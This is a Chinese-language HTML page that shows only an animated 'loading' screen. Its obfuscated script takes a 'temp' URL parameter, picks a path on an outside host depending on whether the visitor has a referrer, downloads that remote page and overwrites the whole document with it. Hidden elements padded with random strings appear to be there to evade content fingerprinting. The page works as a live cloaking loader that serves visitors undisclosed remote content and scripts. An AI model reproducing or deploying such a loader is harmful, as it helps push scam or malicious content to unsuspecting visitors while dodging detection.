<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BDZGdUKM4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BDZGdUKM4 .CGwCi7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BDZGdUKM4 .content {
            line-height: 50px;
            text-align: center
        }

        .BDZGdUKM4 .img {
            width: 100%
        }

        .BDZGdUKM4 .jKk5Cfx {
            text-align: center
        }

        .BDZGdUKM4 .jKk5Cfx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BDZGdUKM4 .jKk5Cfx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BDZGdUKM4 .jKk5Cfx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BDZGdUKM4 .jKk5Cfx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BDZGdUKM4 .jKk5Cfx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BDZGdUKM4 .jKk5Cfx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BDZGdUKM4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function X8lcVJ7YuhMQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wQQuc2 = X8lcVJ7YuhMQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wQQuc2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wQQuc2 +".html?a=share";
		}
		
        GrUIie=url+"#"+new Date().getTime();
        GrUIie && function() {
            $.get(GrUIie, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>Ivc1saoFeEttiZc4eeUGy5cwLTmjrA7KRxP</a>
<p  style='display:none'>jYIWX4bDBy1X8JHQ0b44fjCQbkEgHGYXm0N8uHKBPQ23</p>
<h1 style='display:none' >k67NxtoyHnRhxZn12EYNZhD2BUz8wuczah4DAAUdG5LUGII2lZi8Hrs4spT9bjbud34i</h1>
<a  href='#' style='display:none'>Ivc1saoFeEttiZc4eeUGy5cwLTmjrA7KRxP</a>
<b style='display:none' >sAI9gNbteOdYoEJXjvMhMnXXADZTPlGtvc7Xsm8J7AmrkImdtGqPmH0ANjisF4EF9Qw73Az2</b>
<h1 style='display:none' >k67NxtoyHnRhxZn12EYNZhD2BUz8wuczah4DAAUdG5LUGII2lZi8Hrs4spT9bjbud34i</h1>
<p  style='display:none'>jYIWX4bDBy1X8JHQ0b44fjCQbkEgHGYXm0N8uHKBPQ23</p>
<p  style='display:none'>jYIWX4bDBy1X8JHQ0b44fjCQbkEgHGYXm0N8uHKBPQ23</p>
<span style='display:none'>lbuOdmCckyvHRrcGqeSTb0mVUx3cSPIXA2lf2qXg</span>
<b style='display:none' >sAI9gNbteOdYoEJXjvMhMnXXADZTPlGtvc7Xsm8J7AmrkImdtGqPmH0ANjisF4EF9Qw73Az2</b><div class="BDZGdUKM4">
    <div class="CGwCi7">
        <div class="jKk5Cfx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >RRaIfWLuGL0Piyv11iJIKEZa6UWq3LwyhHDUu4vlPmBwlyVFMC</ul>
<span style='display:none'>No60tzopvFzgIkUVs0GRCadqX9iCbpfn1aJqmf0CAwntEwj5z1aaPL1L8NaOsZym7fI5Aa</span>
<p  style='display:none'>JCMX732sw8DMN8MBzGhUJ</p></body>
</html>